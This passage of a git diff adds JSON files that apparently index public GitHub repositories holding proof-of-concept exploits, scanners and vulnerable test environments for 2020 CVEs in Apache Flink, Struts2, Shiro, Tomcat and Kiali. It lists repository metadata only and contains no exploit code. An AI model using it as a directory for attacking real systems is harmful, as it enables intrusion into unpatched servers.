"full_name": "rakjong\/Flink-CVE-2020-17518-getshell", + "owner": { + "login": "rakjong", + "id": 38517715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38517715?v=4", + "html_url": "https:\/\/github.com\/rakjong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rakjong\/Flink-CVE-2020-17518-getshell", + "description": "利用Apache Flink CVE-2020-17518 getshell", + "fork": false, + "created_at": "2021-01-10T15:06:40Z", + "updated_at": "2023-05-11T02:45:26Z", + "pushed_at": "2021-01-12T07:49:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17519.json b/2020/CVE-2020-17519.json new file mode 100644 index 0000000000..9e721f67e2 --- /dev/null +++ b/2020/CVE-2020-17519.json @@ -0,0 +1,347 @@ +[ + { + "id": 327174696, + "name": "CVE-2020-17519", + "full_name": "B1anda0\/CVE-2020-17519", + "owner": { + "login": "B1anda0", + "id": 74232513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4", + "html_url": "https:\/\/github.com\/B1anda0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1anda0\/CVE-2020-17519", + "description": "Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)", + "fork": false, + "created_at": "2021-01-06T02:15:39Z", + "updated_at": "2024-08-12T20:09:10Z", + "pushed_at": "2021-01-06T23:51:32Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 327323355, + "name": "CVE-2020-17519", + "full_name": "QmF0c3UK\/CVE-2020-17519", + "owner": { + "login": "QmF0c3UK", + "id": 29447678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4", + "html_url": "https:\/\/github.com\/QmF0c3UK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2020-17519", + "description": null, + "fork": false, + "created_at": "2021-01-06T13:41:24Z", + "updated_at": "2024-08-12T20:09:11Z", + "pushed_at": "2021-01-06T13:41:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 327361663, + "name": "apache-flink-directory-traversal.nse", + "full_name": "dolevf\/apache-flink-directory-traversal.nse", + "owner": { + "login": "dolevf", + "id": 5857304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5857304?v=4", + "html_url": "https:\/\/github.com\/dolevf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dolevf\/apache-flink-directory-traversal.nse", + "description": "Apache Flink Directory Traversal (CVE-2020-17519) Nmap NSE Script", + "fork": false, + "created_at": "2021-01-06T16:03:06Z", + "updated_at": "2023-07-15T09:24:44Z", + "pushed_at": "2021-01-06T16:04:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 327822303, + "name": "CVE-2020-17519", + "full_name": "hoanx4\/CVE-2020-17519", + "owner": { + "login": "hoanx4", + "id": 54475792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54475792?v=4", + "html_url": "https:\/\/github.com\/hoanx4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hoanx4\/CVE-2020-17519", + "description": "CVE-2020-17519", + "fork": false, + "created_at": "2021-01-08T06:50:59Z", + "updated_at": "2021-01-11T04:37:45Z", + "pushed_at": "2021-01-11T04:37:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 328279952, + "name": "CVE-2020-17519", + "full_name": "murataydemir\/CVE-2020-17519", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-17519", + "description": "[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read", + "fork": false, + "created_at": "2021-01-10T01:24:50Z", + "updated_at": "2024-08-12T20:09:15Z", + "pushed_at": "2021-01-10T01:26:07Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 329584924, + "name": "CVE-2020-17519-Exp", + "full_name": "radbsie\/CVE-2020-17519-Exp", + "owner": { + "login": "radbsie", + "id": 47312514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47312514?v=4", + "html_url": "https:\/\/github.com\/radbsie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/radbsie\/CVE-2020-17519-Exp", + "description": "CVE-2020-17519 EXP", + "fork": false, + "created_at": "2021-01-14T10:45:29Z", + "updated_at": "2021-01-14T10:50:34Z", + "pushed_at": "2021-01-14T10:46:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 330529595, + "name": "CVE-2020-17519-Apache-Flink", + "full_name": "yaunsky\/CVE-2020-17519-Apache-Flink", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/CVE-2020-17519-Apache-Flink", + "description": "CVE-2020-17519; Apache Flink 任意文件读取; 批量检测", + "fork": false, + "created_at": "2021-01-18T02:03:05Z", + "updated_at": "2021-01-18T02:14:51Z", + "pushed_at": "2021-01-18T02:14:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 342216598, + "name": "westone-CVE-2020-17519-scanner", + "full_name": "Osyanina\/westone-CVE-2020-17519-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2020-17519-scanner", + "description": "A vulnerability scanner that detects CVE-2020-17519 vulnerabilities.", + "fork": false, + "created_at": "2021-02-25T11:06:05Z", + "updated_at": "2021-03-20T07:55:36Z", + "pushed_at": "2021-03-20T07:55:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 357530624, + "name": "CVE-2020-17519", + "full_name": "givemefivw\/CVE-2020-17519", + "owner": { + "login": "givemefivw", + "id": 65514141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4", + "html_url": "https:\/\/github.com\/givemefivw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/givemefivw\/CVE-2020-17519", + "description": "CVE-2020-17519 Cheetah", + "fork": false, + "created_at": "2021-04-13T11:38:18Z", + "updated_at": "2021-04-17T03:26:50Z", + "pushed_at": "2021-04-17T03:26:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 416830075, + "name": "SimplesApachePathTraversal", + "full_name": "MrCl0wnLab\/SimplesApachePathTraversal", + "owner": { + "login": "MrCl0wnLab", + "id": 17049332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4", + "html_url": "https:\/\/github.com\/MrCl0wnLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCl0wnLab\/SimplesApachePathTraversal", + "description": "Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519", + "fork": false, + "created_at": "2021-10-13T17:03:56Z", + "updated_at": "2024-08-28T17:32:14Z", + "pushed_at": "2024-08-14T14:41:14Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-17519", + "cve-2021-41773", + "cve-2021-42013" + ], + "visibility": "public", + "forks": 15, + "watchers": 60, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467441980, + "name": "CVE-2020-17519", + "full_name": "zhangweijie11\/CVE-2020-17519", + "owner": { + "login": "zhangweijie11", + "id": 45932753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45932753?v=4", + "html_url": "https:\/\/github.com\/zhangweijie11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhangweijie11\/CVE-2020-17519", + "description": null, + "fork": false, + "created_at": "2022-03-08T09:19:27Z", + "updated_at": "2022-03-08T09:22:32Z", + "pushed_at": "2022-03-08T09:22:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17523.json b/2020/CVE-2020-17523.json new file mode 100644 index 0000000000..7fecd1de3a --- /dev/null +++ b/2020/CVE-2020-17523.json @@ -0,0 +1,33 @@ +[ + { + "id": 335552799, + "name": "shiro-cve-2020-17523", + "full_name": "jweny\/shiro-cve-2020-17523", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/shiro-cve-2020-17523", + "description": "shiro-cve-2020-17523 漏洞的两种绕过姿势分析 以及配套的漏洞环境", + "fork": false, + "created_at": "2021-02-03T08:14:03Z", + "updated_at": "2024-11-15T22:58:27Z", + "pushed_at": "2021-02-07T09:42:36Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 114, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17527.json b/2020/CVE-2020-17527.json new file mode 100644 index 0000000000..201d6164d8 --- /dev/null +++ b/2020/CVE-2020-17527.json @@ -0,0 +1,33 @@ +[ + { + "id": 336118303, + "name": "CVE-2020-17527-Tomcat", + "full_name": "forse01\/CVE-2020-17527-Tomcat", + "owner": { + "login": "forse01", + "id": 76189258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4", + "html_url": "https:\/\/github.com\/forse01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forse01\/CVE-2020-17527-Tomcat", + "description": null, + "fork": false, + "created_at": "2021-02-05T00:18:45Z", + "updated_at": "2023-03-23T01:16:32Z", + "pushed_at": "2021-02-09T03:15:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17530.json b/2020/CVE-2020-17530.json new file mode 100644 index 0000000000..be54d10912 --- /dev/null +++ b/2020/CVE-2020-17530.json @@ -0,0 +1,346 @@ +[ + { + "id": 319807381, + "name": "CVE-2020-17530", + "full_name": "secpool2000\/CVE-2020-17530", + "owner": { + "login": "secpool2000", + "id": 53165336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53165336?v=4", + "html_url": "https:\/\/github.com\/secpool2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secpool2000\/CVE-2020-17530", + "description": "Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。", + "fork": false, + "created_at": "2020-12-09T01:29:23Z", + "updated_at": "2021-01-25T09:33:40Z", + "pushed_at": "2020-12-09T01:30:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 319912115, + "name": "CVE-2020-17530", + "full_name": "ka1n4t\/CVE-2020-17530", + "owner": { + "login": "ka1n4t", + "id": 22983012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22983012?v=4", + "html_url": "https:\/\/github.com\/ka1n4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ka1n4t\/CVE-2020-17530", + "description": null, + "fork": false, + "created_at": "2020-12-09T09:53:08Z", + "updated_at": "2023-02-02T09:32:39Z", + "pushed_at": "2020-12-09T09:57:45Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 65, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 320346242, + "name": "CVE-2020-17530", + "full_name": "wuzuowei\/CVE-2020-17530", + "owner": { + "login": "wuzuowei", + "id": 26717790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26717790?v=4", + "html_url": "https:\/\/github.com\/wuzuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wuzuowei\/CVE-2020-17530", + "description": "S2-061 的payload,以及对应简单的PoC\/Exp", + "fork": false, + "created_at": "2020-12-10T17:42:37Z", + "updated_at": "2024-08-12T20:08:22Z", + "pushed_at": "2020-12-18T00:57:50Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 321044044, + "name": "CVE-2020-17530", + "full_name": "Al1ex\/CVE-2020-17530", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-17530", + "description": "S2-061 CVE-2020-17530", + "fork": false, + "created_at": "2020-12-13T11:02:15Z", + "updated_at": "2024-08-12T20:08:27Z", + "pushed_at": "2020-12-22T15:27:51Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-17530", + "s2-061" + ], + "visibility": "public", + "forks": 10, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 321259848, + "name": "CVE-2020-17530-strust2-061", + "full_name": "fengziHK\/CVE-2020-17530-strust2-061", + "owner": { + "login": "fengziHK", + "id": 26290583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26290583?v=4", + "html_url": "https:\/\/github.com\/fengziHK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengziHK\/CVE-2020-17530-strust2-061", + "description": "CVE-2020-17530-strust2-061", + "fork": false, + "created_at": "2020-12-14T06:54:57Z", + "updated_at": "2023-02-14T03:22:45Z", + "pushed_at": "2020-12-14T06:57:07Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 322516511, + "name": "freemarker_RCE_struts2_s2-061", + "full_name": "ludy-dev\/freemarker_RCE_struts2_s2-061", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/freemarker_RCE_struts2_s2-061", + "description": "(cve-2020-17530) struts2_s2-061 freemarker_RCE testscript", + "fork": false, + "created_at": "2020-12-18T07:03:57Z", + "updated_at": "2020-12-18T07:05:31Z", + "pushed_at": "2020-12-18T07:05:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325608497, + "name": "CVE-2020-17530", + "full_name": "CyborgSecurity\/CVE-2020-17530", + "owner": { + "login": "CyborgSecurity", + "id": 54816552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54816552?v=4", + "html_url": "https:\/\/github.com\/CyborgSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyborgSecurity\/CVE-2020-17530", + "description": null, + "fork": false, + "created_at": "2020-12-30T17:23:20Z", + "updated_at": "2024-08-12T20:08:59Z", + "pushed_at": "2020-12-30T17:24:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 327634482, + "name": "CVE-2020-17530", + "full_name": "uzzzval\/CVE-2020-17530", + "owner": { + "login": "uzzzval", + "id": 7476462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7476462?v=4", + "html_url": "https:\/\/github.com\/uzzzval", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uzzzval\/CVE-2020-17530", + "description": null, + "fork": false, + "created_at": "2021-01-07T14:24:08Z", + "updated_at": "2021-01-16T13:29:17Z", + "pushed_at": "2021-01-07T19:13:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 332394783, + "name": "CVE-2020-17530-s2-061", + "full_name": "killmonday\/CVE-2020-17530-s2-061", + "owner": { + "login": "killmonday", + "id": 59520081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59520081?v=4", + "html_url": "https:\/\/github.com\/killmonday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killmonday\/CVE-2020-17530-s2-061", + "description": null, + "fork": false, + "created_at": "2021-01-24T07:51:31Z", + "updated_at": "2021-01-24T08:15:39Z", + "pushed_at": "2021-01-24T08:15:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622556599, + "name": "CVE-2020-17530", + "full_name": "keyuan15\/CVE-2020-17530", + "owner": { + "login": "keyuan15", + "id": 56430812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56430812?v=4", + "html_url": "https:\/\/github.com\/keyuan15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keyuan15\/CVE-2020-17530", + "description": "Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)", + "fork": false, + "created_at": "2023-04-02T13:20:42Z", + "updated_at": "2023-04-10T13:45:28Z", + "pushed_at": "2023-04-02T13:22:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674467910, + "name": "CVE-2020-17530", + "full_name": "nth347\/CVE-2020-17530", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2020-17530", + "description": "Vulnerable environment of CVE-2020-17530 (S2-061) for testing", + "fork": false, + "created_at": "2023-08-04T03:00:28Z", + "updated_at": "2023-08-04T03:04:10Z", + "pushed_at": "2023-08-04T03:02:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17531.json b/2020/CVE-2020-17531.json new file mode 100644 index 0000000000..18f0f23da7 --- /dev/null +++ b/2020/CVE-2020-17531.json @@ -0,0 +1,33 @@ +[ + { + "id": 319884337, + "name": "CVE-2020-17531", + "full_name": "154802388\/CVE-2020-17531", + "owner": { + "login": "154802388", + "id": 44390729, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44390729?v=4", + "html_url": "https:\/\/github.com\/154802388", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/154802388\/CVE-2020-17531", + "description": "Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。", + "fork": false, + "created_at": "2020-12-09T08:01:10Z", + "updated_at": "2020-12-24T03:29:48Z", + "pushed_at": "2020-12-09T03:10:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17533.json b/2020/CVE-2020-17533.json new file mode 100644 index 0000000000..e29b4d6932 --- /dev/null +++ b/2020/CVE-2020-17533.json @@ -0,0 +1,33 @@ +[ + { + "id": 319951353, + "name": "CVE-2020-17533", + "full_name": "pazeray\/CVE-2020-17533", + "owner": { + "login": "pazeray", + "id": 75724257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75724257?v=4", + "html_url": "https:\/\/github.com\/pazeray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazeray\/CVE-2020-17533", + "description": null, + "fork": false, + "created_at": "2020-12-09T12:34:54Z", + "updated_at": "2021-09-09T13:27:49Z", + "pushed_at": "2020-12-09T00:42:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1764.json b/2020/CVE-2020-1764.json new file mode 100644 index 0000000000..f1b71d5743 --- /dev/null +++ b/2020/CVE-2020-1764.json @@ -0,0 +1,38 @@ +[ + { + "id": 277557089, + "name": "cve-2020-1764-poc", + "full_name": "jpts\/cve-2020-1764-poc", + "owner": { + "login": "jpts", + "id": 5352661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5352661?v=4", + "html_url": "https:\/\/github.com\/jpts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jpts\/cve-2020-1764-poc", + "description": "Auth Bypass PoC for Kiali", + "fork": false, + "created_at": "2020-07-06T13:59:52Z", + "updated_at": "2022-09-14T16:51:22Z", + "pushed_at": "2020-07-06T14:02:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1764", + "istio", + "kiali", + "kubernetes" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-18324.json b/2020/CVE-2020-18324.json new file mode 100644 index 0000000000..a3b48eec73 --- /dev/null +++ b/2020/CVE-2020-18324.json @@ -0,0 +1,33 @@ +[ + { + "id": 463203318, + "name": "CVE-2020-18324", + "full_name": "hamm0nz\/CVE-2020-18324", + "owner": { + "login": "hamm0nz", + "id": 16913167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16913167?v=4", + "html_url": "https:\/\/github.com\/hamm0nz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hamm0nz\/CVE-2020-18324", + "description": "Exploit PoC for CVE-2020-18324", + "fork": false, + "created_at": "2022-02-24T15:38:11Z", + "updated_at": "2022-02-26T17:41:07Z", + "pushed_at": "2022-02-25T11:14:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-18325.json b/2020/CVE-2020-18325.json new file mode 100644 index 0000000000..948ba46100 --- /dev/null +++ b/2020/CVE-2020-18325.json @@ -0,0 +1,33 @@ +[ + { + "id": 463915095, + "name": "CVE-2020-18325", + "full_name": "hamm0nz\/CVE-2020-18325", + "owner": { + "login": "hamm0nz", + "id": 16913167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16913167?v=4", + "html_url": "https:\/\/github.com\/hamm0nz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hamm0nz\/CVE-2020-18325", + "description": "Exploit PoC for CVE-2020-18325", + "fork": false, + "created_at": "2022-02-26T17:06:09Z", + "updated_at": "2022-02-26T17:41:26Z", + "pushed_at": "2022-02-26T17:29:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-18326.json b/2020/CVE-2020-18326.json new file mode 100644 index 0000000000..9d612957dd --- /dev/null +++ b/2020/CVE-2020-18326.json @@ -0,0 +1,33 @@ +[ + { + "id": 463920955, + "name": "CVE-2020-18326", + "full_name": "hamm0nz\/CVE-2020-18326", + "owner": { + "login": "hamm0nz", + "id": 16913167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16913167?v=4", + "html_url": "https:\/\/github.com\/hamm0nz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hamm0nz\/CVE-2020-18326", + "description": "Exploit PoC for CVE-2020-18326", + "fork": false, + "created_at": "2022-02-26T17:30:41Z", + "updated_at": "2022-02-26T17:41:47Z", + "pushed_at": "2022-02-26T17:39:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-19360.json b/2020/CVE-2020-19360.json new file mode 100644 index 0000000000..9ed0cd324a --- /dev/null +++ b/2020/CVE-2020-19360.json @@ -0,0 +1,64 @@ +[ + { + "id": 685531028, + "name": "CVE-2020-19360", + "full_name": "a1665454764\/CVE-2020-19360", + "owner": { + "login": "a1665454764", + "id": 143511005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143511005?v=4", + "html_url": "https:\/\/github.com\/a1665454764", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a1665454764\/CVE-2020-19360", + "description": "CVE-2020-19360", + "fork": false, + 